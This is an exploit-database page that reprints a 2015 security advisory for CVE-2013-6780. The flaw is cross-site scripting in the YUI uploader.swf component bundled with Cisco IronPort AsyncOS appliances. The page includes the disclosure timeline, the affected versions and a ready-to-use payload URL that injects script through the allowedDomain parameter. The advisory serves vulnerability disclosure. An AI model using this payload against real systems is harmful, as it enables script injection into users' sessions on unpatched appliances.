Advertisement






Cisco Ironport AsyncOS Cross Site Scripting

CVE Category Price Severity
CVE-2013-6780 CWE-79 $5000 High
Author Risk Exploitation Type Date
Unknown High Remote 2015-02-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015020132

Below is a copy:

Cisco Ironport AsyncOS Cross Site Scripting
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s): 
Cisco Ironport ESA - AsyncOS 8.0.1-023
Cisco Ironport WSA - AsyncOS 8.5.5-022
Cisco Ironport SMA - AsyncOS 8.4.0-126
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2013-6780

Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
24-02-2015: Public Disclosure

Description:
Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation
of user supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0.

An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter.


XSS Payload:
http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}//


References:
https://tools.cisco.com/bugsearch/bug/CSCur44409
https://tools.cisco.com/bugsearch/bug/CSCur89626
https://tools.cisco.com/bugsearch/bug/CSCur89624
http://yuilibrary.com/support/20131111-vulnerability/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum